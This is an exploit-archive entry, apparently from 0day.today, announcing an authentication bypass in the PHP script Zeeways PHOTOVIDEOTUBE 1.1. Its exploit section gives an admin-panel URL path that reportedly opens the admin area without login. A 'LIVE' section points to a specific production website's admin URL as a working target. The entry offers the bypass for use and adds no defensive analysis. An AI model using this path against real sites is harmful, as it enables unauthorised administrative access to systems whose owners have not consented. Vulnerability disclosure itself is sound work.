id: 4138
date: 11/08/2008
title: Zeeways PHOTOVIDEOTUBE 1.1 Auth Bypass Vulnerability
author: Stack
cves: 

====================================================
Zeeways PHOTOVIDEOTUBE 1.1 Auth Bypass Vulnerability
====================================================


==============================================================================
 Zeeways PHOTOVIDEOTUBE v1.1  Auth Bypass Vulnerability
==============================================================================
 [»] Script  :          [ Zeeways PHOTOVIDEOTUBE v1.1  ]
 [»] Language:          [ PHP ]
 [»] Website :          [ http://zeeways.com/php-software/photovideotube-v1.1.html ]
        [»] Discover:          [ Mountassif Moad  ]
===[ XPL ]===
 [»] http://localhost/[path]/admin/home.php

===[ LIVE ]===
 [»] http://www.photovideotube.com/admin//main.php



#  0day.today [2023-03-22]  #